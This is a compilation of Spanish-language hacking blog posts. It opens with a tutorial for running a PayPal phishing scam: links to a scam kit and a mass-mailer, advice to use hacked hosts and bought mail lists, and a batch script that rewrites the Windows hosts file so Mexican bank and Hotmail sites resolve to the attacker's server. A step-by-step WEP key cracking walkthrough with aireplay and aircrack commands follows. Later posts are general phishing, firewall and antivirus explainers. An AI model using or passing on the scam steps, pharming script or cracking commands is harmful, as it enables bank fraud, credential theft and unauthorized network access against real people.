Material:
Scam
Hacked Host
Mail list
Mailer Inbox

Primero hacemos el scam de alguna web .. aqui se los dejo es de paypal
http://rapidshare.com/files/88997799/Scam_PayPal_2008.zip.html

Lo descomprimimos, lo submos a algun hacked host o algun host que tengamos y cuando lo tenemos montado lo probamos y nos dedicamos a buscar cuentas de correo para mandarles el scam, pueden buscar con algun extractor de mails correos , pero como
siempre estan quemados y es posible que algunos no funcionen, lo mas conveniente es decirle a algun wey que se dedique a esto a que te haga el paro y te venda algun mail list para paypal (podria ser de cualquier cosa, banamex, hi5, etc ) si no buquen
por la red hay bastantes, yo les recomiendo el elite extractor, o el tarantula..

Bien ya que tenemos un mail list, conseguimos algun mailer inbox, aqui les dejo la descarga de uno
http://rapidshare.com/files/76390702/mailerpriv8.php

Lo subimos a algun hacked host, no recomiendo host gratuito porque no los envia, ya teniendolo buscamos la letter del scam
(que es lo que se escribe para engañar a la victima)
y si tenemos una letter para pharming nos dedicamos a crear uno

Antes de seguir, el pharming es un metedo que consiste en manipular las dns que usa la victima haciendole creer que entra a una web pero en realidad esta en otra (por ejemplo en el scam)

Ejemplo en batch

@echo off
echo ipdetuhost www.banamex.com.mx >> %windir%\system32\drivers\etc\hosts
echo ipdetuhost www.bbva.com >> %windir%\system32\drivers\etc\hosts
echo ipdetuhost www.bancomer.com.mx >> %windir%\system32\drivers\etc\hosts
echo ipdetuhost www.esmas.com >> %windir%\system32\drivers\etc\hosts
echo ipdetuhost www.hotmail.com >> %windir%\system32\drivers\etc\hosts
exit

Como veran de esta manera cuando la victima ejecute este archivo y entre a banamex, bbva, bancomer desde el explorador sera redirigido a ipdetuhost y de esta manera el usuario no se va a dar cuenta que realmente esta en una web fake

Solo es teoria en general pero poco a poco AHhahAH

–StATiK–

lo que tratare de explicar es, como obtener las claves de redes inalambricas, para este caso me basare en romper una clave de encriptacion wep a 64 bits, recomoiendo que lean un poco sobre tipo de encriptaciones de redes wifi para saber mejor cuando van a atacar una red de este tipo.

Nota: En las imagenes se puede apreciar que las edite para no mostrar las direcciones Mac y a si evitarme problemas
Vamos a ver como podemos obtener claves de redes inalambricas, para este ejemplo me basare en hackear mi propia red.

Material usado:
cd wifislax 2.0
tarjeta inalambrica: Ather0s
tamaño de memoria raam: 256

Bien, lo primero que tenemos que hacer una ves ya estado en nuestra live cd es poner nuestra tareta en modo monitor, para eso vamos a:

Menu>Wifislax>Asistencia Chipse>Asistencia Chipset Ather0s> Crear interface (Modo Monitor)

Bien, ahora lo siguiente es ejecutar Kismet para poder ver por que canal viaa la red victima, la Mac y el tipo de encriptacion.

Menu>Wifislax>Herramientas Wireless>Monitorizacion wireless (Kismet)

en driver selecciono rt2500 y le doy aplicar.

cuando inicie la pantalla de kismet tecleamos la tecla de <space> y despues tecleamos la teltra “s” 2 veces

tecleamos enter sobre la red vicitima:

y anotamos los datos que nos interesan:

ssd, bssid, chanel y Encrypt:

podemos observar en la imagen que la ssid (Nombre de la red) es Th3r0rn, la bssid es la MAC, Tambien podemos ver que el canal por el que viaja la red es el 6 y tambien que el tipo de encriptacion es WEP.

Una ves que tenemos esos datos ya anotados, salimos presionando la tecla ” Q” despues sobre la misma red victima tecleamos la letra “C” esto para ver las maquinas conectadas a la red mediante wireless claro

Bien ahora cerramos la ventana de Kismet y ejecutamos una nueva shell, ya que tenemos nuestra shell lo siguiente sera ejecutar airodump, para ello lo ejecutaremos a si:

airodump ath0 th3r0rn 6

explico la sintaxis: donde airodump hacemos la llamada al programa, donde ath0 es nuestra interfaz wireless, donde th3r0rn es el nombre del archivo que se genrara en formato .cap o .ivs el nombre puedes poner el que quieras, y en donde 6 es el canal por el cual airodump va a capturar el trafico filtrando todos los demás canales ya que como vimos antes en la pantalla del kisme, nuestra red victima viaja por el canal 6.

ahora lo que tenemos que hacer es asociarnos a la red para poder inyectar trafico. para esto ejecutamos aireplay, la sintaxis es:

aireplay -1 0 -e ESSID -a BSSID -h STACION ath0

por lo cual:

ejecutaremos:

aireplay-ng -1 0 -e Th3r0rn -a aqui la MAC -h aqui la stacion ath0

como resultado vemos que nos asociamos a la red de manera correcta:

ahora lo siguiente es acelerar el trafico en la red, para inyectaremos trafico con aireplay:

su sintaxis es:

aireplay-ng -3 -b MAC -h STATION ath0

recordemos que donde ath0 es nuestra interfaz, entonces ejecutamos y solo nos sentamos a esperar a que inyecte el el trafico necesario para poder obtener nuestra clave wep : -)

ya que tenemos mas 250mil iv’s capturados (necesarios para romper una wep de 64 bits, podemos ejecutar aircrack para poder obtener la clave.

su sintaxis:

aircrack archivo.cap

observemos la red vicitma tiene 303404 IV’s

y que su numero de identificador es “1″

por lo cual tecleamos 1 y damos enter

y Bingooo¡

Tenemos la nuestra clave:

en la imagen donde tengo aircrack y me muestra q son 303404 IV’s se aprecia que use 2 archivos.cap esto es por que tuve que hacer algo por lo cual detuve la captura de trafico y cuando termine capture lo que me hacia falta

por supuesto que el numero de datos a capturar para poder obtener la clave de la red dependerá de que tipo de encriptacion en que esta se encuentre.

disculpen los errores ortográficos a si como de redacción.
Nota: Pueden copiar el tutorial siempre y cuando usen el nombre del autor. saludos
Contaco: franzhackerss.com y mi blog Imgeek
th3r0rn
Nota: Este fue solo escrito con fines educativos para aprender y protegerse de este tipo de ataques cual quier aclarasion o porblemas legales pueden contactar con el administrador de este sitio

Bueno en este tutorial uso una herramienta llamada teleport para guardar sitios web.

Con todo e imagenes,directorios etc.

(Con esto tambien pueden hacer scam’s o fakes como le llamen.)

Es facil, para eso les deje un videotutorial hecho por mi, esta algo pesadito el video ya que lo edite.

Espero les guste, fue dedicado a www.blogdelhacker.com

Descarga del video: VIDEO

Bueno hoy en la mañana esta viendo noticias asta que me entere de que un hacker, se manifesto en la web de la Camara de diputados.

El hacker aseguro tener 14 años de edad y dejo un mensaje de protesta de la situacion politica del pais.

El responsable de sistemas de la Cámara, Miguel Vega, explicó a la prensa que la infiltración duró aproximadamente una hora y agregó que esta ha sido la primera ocasión en que ocurre una violación a la página electrónica de esta institución.

La pagina web, ha sido victima de miles de atakes,asta esta vez.

Y acontinuacion su manifiesto:

“Buenas (tardes) tengan todos ustedes. Mi nick es Axuz, tengo 14 años de edad y tengo los ojos bien abiertos a lo que hace el Gobierno”, dijo el hacker en su mensaje.

“No ha cambio nada, sigue habiendo pobreza, corrupción, violencia y destrucción, sólo quiero ver si logro hacer conciencia en todos ustedes políticos, no quiero ser sancionado con nada, sólo quiero manifestarme libremente, que es la única manera que van a escuchar a un joven de 14 años… no quiero problemas”, agregó el mensaje del intruso.

El responsable de Sistemas explicó que esta intromisión se produjo hoy en una red no clasificada en uno de los accesos del menú de “información de diputados” por más de una hora, lo que causó una avería en el sistema.

Bueno mi opinion es:

Que ese niño (Hacker) quiso abrirles los ojos a los diputados, pero lo que mas coraje me da esque ellos se fijen en que violaron su seguridad y no analizar la forma de exprecion de su mensaje, el niño claramente aclaro que el no quizo causar daño.

En fin…

un saludo rUsH

Bueno esta vez les voy a hablar de phishing:

El phishing en la informatica es un delito, que es algo parecido a los scam’s, que usan los carder’s, osea el phishing es una manera de estafa, el estafador es un phisher, lo que hace este phisher, es usar ingenieria social, para sacar informacion confiencial, este phisher, se hace pasar como por algun ingeniero de alguna empresa, o alguna persona importante.

Los phisher’s los metodos mas comunes que usan son: Correo electronico, Paginas web.

Hay algunos otros, como sistemas de mensajeria instantanea, o por llamadas telefonoicas.

El phishing es un delito, ya que muchas personas han caido en esos fraudes.

Aora continuamos con la historia de phishing:

Origen de la palabra

El término phishing proviene de la palabra en inglés “fishing” (pesca) haciendo alusión al acto de pescar usuarios mediante señuelos cada vez más sofisticados, y de este modo obtener información financiera y contraseñas. Quien lo practica es conocido con el nombre de phisher . También se dice que el término “phishing” es la contracción de “password harvesting fishing” (cosecha y pesca de contraseñas), aunque esto probablemente es un acrónimo retroactivo.

Son posibles traducciones apropiadas en español los términos anzuelo o estafa electrónica.

La primera mención del término phishing data de enero de 1996 en grupo de noticias de hackers alt.2600 , aunque el término apareció tempranamente en la edición impresa del boletín de noticias hacker “2600 Magazine” . El término phishing fue adoptado por crackers que intentaban “pescar” cuentas de miembros de AOL; ph es comúnmente utilizado por hackers para sustituir la f, como raíz de la antigua forma de hacking conocida como “phone phreaking”.

Bueno un ejemplo de phishing es:

Las paginas web, esas famosas que te dicen, mira quien te admite y quien no te admite, algunas de esas web’s son falsas y tan solo lo que hacen es llamar la atencion y luego cuando te registrar o inicias secion, te roban los datos de tu cuenta.

Tambien existen tecnicas antiphishing:

Esto en realidad es algo personal, las tecnicas, no creas que es algo relacionado con softwares ni nada por el estilo, solo es que no te dejes engañar, antes de soltar informacion investiga por otros medios, yo lo que recomiendo es no dar informacion a cualquier persona.

Ya que cuando confiamos en alguien, damos a conocer alguna informacion importante, si que lo notes.

Esto va relacionado con la ingenieria social. solo mi consejo es que no se dejen llevar por las apariencias.

Text by rUsH.

Historia sacada de : wikipedia

A cotninuación podrás ver un tutorial completo para prevenirse de los virus y las herramientas necesarias para tal acción espero lo lean.

Extraido del tutorial: 

JUSTIFICACIÓN
En definitiva, sea cual fuere el motivo por el cual se siguen produciendo virus, se
debe destacar que su existencia no ha sido sólo perjuicios: gracias a ellos, mucha
gente a tomado conciencia de qué es lo que tiene y cómo protegerlo.

OBJETIVOS

DESCARGAR TUTORIAL

CONCLUSIÓN
Este trabajo esta hecho con el fin de afianzar nuestro conocimiento acerca de lo que es en
realidad un virus informatico su impacto a nivel personal y de sistemas teniendo en cuanta
la importancia que tienen lo datos que se almacenan y el correcto manejo de las opciones
informáticas que nos pueden ayudar a salvar parcial o totalmente de los datos que se
encuentren en riesgo a causas de algunas de estas aplicaciones que ponen en peligro
cualquier tipo de sistema protegido, si hablamos de virus nuevos, que por su tamaño tan
imperceptible y las tantas maneras que encuentra para su propagación y reproducción
pueden llegar y hacernos pasar un mal rato y obtener perdidas irrecuperables.

Extraido de: ReadHacked.COM

Hola bueno es la segunda vez que tengo que hacer este tutorial ya que la primera ves casi lo terminaba y se me cerro la ventana y me queria matar pero bue a escribir   todo de nuevo se ah dicho… Muchos tenemos firewall sabemos que es para protejer nuestros datos pero muchos no saben como funciona y cuales son sus caracteristicas veamos…

Que es una Red Firewall?

Lo que hace un Red Firewall es mantener a los intruso fuera de nuestro camino o mejor dicho mantenerlos alejados para qu eno nos roben eliminen nuestros datos…
Un firewall es un sistema controlado por Empresas muchas veces que crean barreras seguras de un punto a otro de una Red.

Como utilizar una Red Firewall

Una red firewall puede actuar como una empresa embajadora de Internet. Muchas empresas usan susistema firewall como un lugar donde poder almacenar información pública acerca de los products de la empresa, ficheros que pueden ser recuperados por personal de la empresa y otra información de interés para los miembros de la misma. Muchos de estos sistemas han llegado a ser partes importantes de la estructura de servicios de Internet (entre los ejemplos encontrados tenemos: UUnet.uu.net, whitehouse.gov, gatekeeper.dec.com).

Proteccion de una Firewall

Alguna firewall sólamente permiten tráfico de correo a través de ellas, de modo que protegen de cualquier ataque sobre la red distinto de un servicio de correo electrónico. Otras firewall proporcionan menos restricciones y bloquean servicios que son conocidos por sus constantes problemas de intrusión.

las firewalls están configuradas para proteger contra “logins” interactivos sin autorización expresa, desde cualquier parte del mundo. Esto, ayuda principalmente, a prevenir actos de vandalismos en máquinas y software de nuestra red. las mas elaboradas bloquean el tráfico de fuera a dentro, permitiendo a los usuarios del interior, comunicarse libremente con los usuarios del exterior.

Las redes firewall, puede protegernos de cualquier tipo de ataque a la red, siempre y cuando se configuren para ello. Las redes firewall son también un buen sistema de seguridad a la hora de controlar estadísticas de usuarios que intentaron conectarce y no lo consiguieron, tráfico que atraveso la misma, etc…
Esto proporciona un sitema muy comodo de auditar la red…

En lo que no nos puede protejer una Red de Firewall son las aberturas por las que se puede colar un intruso (lo que se llaman “back-doors” o “puertas traseras”
Las firewalls no pueden luchar, son contra los traidores y estupidos que haya en la propia organización. Es ebidente, que de nada sirve que se instale una firewall para proteger nuestra red, si existen personas dentro de la misma que se dedican a traspasar información a través de disquettes (por poner un ejemplo) a empresas espias.

Sabemos que los firewall protejen nuestros datos por la red eh inpiden el traspaso de intruso a si como robos y eliminacion de archivos pero cuando hablamos de VIRUS estos son mas dificil de blokiar por el simple echo de que hay demasiados modos de condifcación binaria de ficheros para transmitirlos a través de la red y también son demasiadas las diferentes arquitecturas y virus que intentan introducirse en ellas…

Pero la mayor responsable somos nosotros los user ya que si no tenemos un control de lo que pasamos por la red mejor dicho lo que resibimos entonces tendremos mas inseguridad y tambien tener cuidado en los programas que ejecutemos

Adquirir una Red Firewall

Primero que todo para adquirir una Red Firewall hay que tener en cuenta para adquirirlo.

Si se destina la firewall para porporcionar un método de medición y auditoria de los accesos no autorizados a la red…

cual es el nivel de vigilancia, redundancia y control queremos…

Tambien y uno de los mas importantes cuanto cuesta comprar o implementar tal cosa o tal otra. Por ejemplo, un producto completo de red firewall puede costar 100.000 dolares. Pero este precio se trata de una firewall de alta resolución final. Si no se busca tanta resolución final, existen otras alternativas mucho más baratas…

Se debe tomar la decisión de colocar una máquina desprotegida en el exterior de la red para correr servicios proxy tales como telnet, ftp, news, etc…

TIPOS BASICOS de   Redes Firewall!

@ Nivel de red.

@ Nivel de aplicación.

Las firewalls a nivel de red : Normalmente toman las desisiones basándose en la fuente, dirección de destino y puertos, todo ello en paquetes individuales IP. Un simple router es un “tradicional” firewall a nivel de red, desde el momento que no puede tomar decisiones sofisticadas en relación con quién está hablando un paquete ahora o desde donde está llegando en este momento.
a nivel de red es que ellas enrutan el tráfico directamente a través de ellas, nivel de red tienden a ser más veloces y más transparentes a los usuarios.

Las Firewalls a nivel de aplicación : Es donde los proxy corren en un host eso hace que nos permita un trafico directo de REd en REd Tambien sos usadas como traductoras de direcciones de RED . Las firewalls a nivel de aplicación, tienden a proporcionar mayor detalle en los informes auditados e implementan modelos de conservación de la seguridad. Esto las hace diferenciarse de las firewalls a nivel de red.

firewall FUTURO

En un futuro las firewall incorporaran y ya lo estan haciendo mejor dicho encriptaciónes de modo que, pueden proteger el tráfico que se produce entre ellas e Internet. Las firewalls con encriptación extremo-a-extremo (end-to-end), se puede usar por organizaciones con múltiples puntos de conexión a Internet , para conseguir utilizar Internet como una “central privada” donde no sea necesario preocuparse de que los datos o contraseñas puedan ser capturadas.

servidores proxy y como trabajan

Un servidor Proxy se refiere a un gateway que es puerta de enlase   que se comunica con otra Red

Los proxis se utilizan a menudo, como sustitutorios de routrs controladores de tráfico, para prevenir el tráfico que pasa directamente entre las redes.

Los servidores proxy, son:

Son los TIS Internet Firewall Toolkit “FWTK”, que incluyen proxies para Telnet, rlogin, FTP, X-Windows, http/Web, y NNTP/Usenet news. SOCKS

Web/http con una firewall

Se conocen 3 formas de hacer que funcionen con la Web/http:

1.) Establecer conexiones via un router, si se están usando routers protegidos.

2.) Usar un cliente Web que soporte SOCKS, y correr SOCKS en tu firewall.

3.) Ejecutar alguna clase de servidor Web proxy en la firewall.

FTP a través de una firewall

Primero puede ser permitiendo coneciones entrante para FTP cuando los puertos estas restringidos.

si no restringiendo las conexiones entrantes con algun tipo de regla que se extrablesca.

Telnet a través de una firewall

Con telnet ya debemos unos proxys como este: “firewall toolkit’s tn-gw”
o si no configuramos el router para las conexiones entrantes con alguna proteccion.

A la hora de comprar un Firewall debemos tener en cuenta algunas cosas por ej: La firewall incluye hardware o sólo software, Qué clase de interfaces de red soforta la firewall? (¿Necesitaré token ring, routers ethernet, etc? se maneja la firewall desde un puesto remoto?

Terminos relacionados con firewall [ Wikipedia.com >

Abuso de privilegio: Cuando un usuario realiza una acción que no tiene asignada de acuerdo a la política organizativa o a la ley.
Ataque interior: Un atáque originado desde dentro de la red protegida.
Autentificación: El proceso para determinar la identidad de un usuario que está intentando acceder a un sistema.

Autorización: Proceso destinado a determinar que tipos de actividades se permiten. Normalmente, la autorización, está en el contexto de la autentificación.

Bastion Host: Un sistema que ha sido configurado para resistir los ataques y que se encuentra instalado en una red en la que se prevee que habrá ataques. Frecuentemente, los Bastion hosts son componentes de las firewalls, o pueden ser servidores Web “exteriores” o sistemas de acceso público.

Detección de intrusión: Detección de rupturás o intentos de rupturas bien sea manual o vía sistemas expertos de software que atentan contra las actividades que se producen en la red o contra la información disponible en la misma.
Dual Homed Gateway: Un “Dual Homed Gateway” es un sistema que tiene 2 o más interfaces de red, cada uno de los cuales está conectado a una red diferente.
Firewall: Un sistema o combinación de sistemas que implementan una frontera entre 2 o más redes.
Host-based Security: La técnica para asegurar de los ataques, a un sistema individual.

Logging: El proceso de almacenamiento de información sobre eventos que ocurren en la firewall o en la red.

Router - Encaminador: Dispositivo destinado a conectar 2 o más redes de area local y que se utiliza para encaminar la información que atraviesa dicho dispositivo.

Screened Host: Un host - ordenador servidor - en una red, detrás de un router protegido. El grado en que el host puede ser accesible depende de las reglas de protección del router.

Screened Subnet: Una subred, detrás de un router protegido. El grado en que la subred puede ser accesible depende de las reglas de protección del router.

Tunneling Router: Un router o sistema capaz de dirigir el tráfico, encriptándolo y encapsulándolo para transmitirlo a traves de una red y que también es capaz de desencaptular y descifrar lo encriptado.

fin.
salu2

Extraccion: ReadHacked.COM

Hemos activado el registro de usuarios para que todos os podáis registrar en el blog sin problemas y podáis recibir correos, responder entradas con vuestro nick reservado…

Registrarse en el Blog

Esperemos que aprendáis y ya de paso compartáis vuestros conocimientos con nosotros, recordad leer tutoriales, artículos y practicar lo leido con compañeros, en conjunto siempre se aprende más que por separado.

Pronto tendremos nuevos proyectos en los que todos podremos participar.

Mientras podéis acceder a ForoHack.com para escribir tus artículos para incluirlos en el blog, para responder preguntas, para plantear dudas :), para ello os tendréis que registrar:

Registrarse en ForoHack.com

Un saludo a todos!

Esto es de gran ayuda para probar el funcionamiento del nuevo Exchange y comparar los cambios que realiza el Service Pack en la plataforma. No hace falta decir que viene todo pre-configurado.

Tenemos un periodo de 30 días para probar el funcionamiento y el total a descargar son aproximadamente 1.5GB repartidos en tres ficheros.

Esta es una buena oportunidad para probar el nuevo Exchange para aquellos que aun no lo han hecho.

Mas informacion sobre el Exchange 2007 SP1:
Excelente explicacion sobre el Microsoft Exchange Server 2007

Salu2!!!!

Tiene varias opciones a escoger como se ve en la imagen!.

Es para saber el tipo de optimizacion de tu equipo.

Ejemplo: Oficina de trabajo, Entretenimiento,o Juegos.

si no sabes solo coges la opcion I dont know, lo que hace es buscar la optimizacion adecuada para tu pc.

Link de descarga!: Intell hyper speed

Un saludo espero les sirva.